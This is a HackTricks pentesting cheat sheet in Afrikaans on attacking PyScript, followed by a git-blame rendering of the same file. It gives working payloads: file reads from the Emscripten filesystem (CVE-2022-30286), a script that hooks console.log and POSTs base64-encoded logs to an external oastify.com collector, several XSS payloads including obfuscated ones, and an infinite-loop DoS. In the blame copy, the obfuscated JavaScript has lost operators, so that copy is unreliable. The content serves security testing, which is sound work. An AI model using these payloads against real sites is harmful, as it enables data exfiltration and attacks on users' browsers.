hacktricks/generic-methodologies-and-resources/python/pyscript.md

# Pyscript

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>

## PyScript Pentesting Gids

PyScript is 'n nuwe raamwerk wat ontwikkel is om Python in HTML te integreer, sodat dit saam met HTML gebruik kan word. In hierdie spiekbriefie sal jy vind hoe om PyScript te gebruik vir jou penetrasietoetsdoeleindes.

### Dumping / Ophaling van lêers uit die Emscripten virtuele geheuebestandstelsel:

`CVE ID: CVE-2022-30286`\
\
Kode:
```html
<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</py-script>
```
Result:

![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)

### [OOB Data Exfiltration van die Emscripten virtuele geheue-lêersisteem (konsole monitering)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)

`CVE ID: CVE-2022-30286`\
\
Kode:
```html
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>
```
Result:

![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)

### Kruiswebkrips (Gewoonlik)

Kode:
```python
<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>
```
Result:

![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)

### Kruiswebkripsing (Python Versteur)

Kode:
```python
<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"

print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>
```
Result:

![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)

### Kruiswebkrips (JavaScript-verduistering)

Kode:
```html
<py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>
```
Result:

![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)

### DoS-aanval (Oneindige lus)

Kode:
```html
<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>
```
Result:

![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.

</details>
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`# Pyscript`

GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Ander maniere om HackTricks te ondersteun:`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Sluit aan by die 💬 [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github-opslag.`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
			`</details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## PyScript Pentesting Gids`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`PyScript is 'n nuwe raamwerk wat ontwikkel is om Python in HTML te integreer, sodat dit saam met HTML gebruik kan word. In hierdie spiekbriefie sal jy vind hoe om PyScript te gebruik vir jou penetrasietoetsdoeleindes.`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Dumping / Ophaling van lêers uit die Emscripten virtuele geheuebestandstelsel:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`CVE ID: CVE-2022-30286`\
			`\`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Kode:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```html
			`<py-script>`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:`
			`out = fin.read()`
			`print(out)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`</py-script>`
			```
			`Result:`

			`![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### [OOB Data Exfiltration van die Emscripten virtuele geheue-lêersisteem (konsole monitering)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`CVE ID: CVE-2022-30286`\
			`\`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Kode:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```html
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<py-script>`
Update pyscript.md 2022-09-12 17:36:08 +00:00			`x = "CyberGuy"`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`if x == "CyberGuy":`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`with open('/lib/python3.10/asyncio/tasks.py') as output:`
			`contents = output.read()`
			`print(contents)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`</py-script>`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```
			`Result:`

			`![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Kruiswebkrips (Gewoonlik)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Kode:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```python
			`<py-script>`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`print("<img src=x onerror='alert(document.domain)'>")`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`</py-script>`
			```
			`Result:`

			`![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Kruiswebkripsing (Python Versteur)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Kode:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```python
			`<py-script>`
			`sur = "\u0027al";fur = "e";rt = "rt"`
			`p = "\x22x$$\x22\x29\u0027\x3E"`
			`s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"`
			`e = "c\u003d";q = "x"`
			`y = "o";m = "ner";z = "ror\u003d"`

			`print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)`
			`</py-script>`
			```
			`Result:`

			`![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Kruiswebkrips (JavaScript-verduistering)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Kode:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```html
			`<py-script>`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
			`</py-script>`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```
			`Result:`

			`![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### DoS-aanval (Oneindige lus)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Kode:`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```html
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<py-script>`
			`while True:`
			`print("                              ")`
			`</py-script>`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```
			`Result:`

			`![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Ander maniere om HackTricks te ondersteun:`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Sluit aan by die 💬 [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
			`</details>`